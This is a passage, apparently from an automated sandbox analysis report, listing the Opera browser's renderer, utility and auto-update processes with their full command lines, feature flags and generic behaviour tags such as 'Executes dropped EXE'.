--with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --mojo-platform-channel-handle=4600 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=4608 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=4848 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=5196 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=5704 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=5480 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=6564 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6024 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=5904 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=4820 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:1
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6672 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6684 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6696 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6708 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6720 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6732 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6736 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6036 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6752 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off --with-feature:yandex-zen-lift-up=off --with-feature:yandex-zen-news=off --with-feature:yandex-zen-news-next=on --with-feature:yat-emoji-addresses=on --with-feature:installer-experiment-test=off --mojo-platform-channel-handle=6640 --field-trial-handle=2032,i,2302051205468072066,18119542197104094638,131072 /prefetch:8
-
C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_autoupdate.exe" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" --pipeid=oauc_pipe2906202b27b41e4bd66c9238c4b575c1
-
C:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_autoupdate.exeC:\Users\Admin\AppData\Local\Programs\Opera\94.0.4606.76\opera_autoupdate.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=94.0.4606.76 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff65057ab38,0x7ff65057ab48,0x7ff65057ab58
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --with-feature:aliexpress-modal=off --with-feature:automatic-video-popout-expanded=on --with-feature:continue-on-booking=on --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:partner-dropdown-suggestions-boost=on --with-feature:personalized-speeddials=on --with-feature:premium-valve-in=on --with-feature:sd-suggestions-external=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner=on --with-feature:tiktok-panel=off --with-feature:yandex-zen-iframe-scroll=on --with-feature:yandex-zen-leads-for-nonsdusers=off 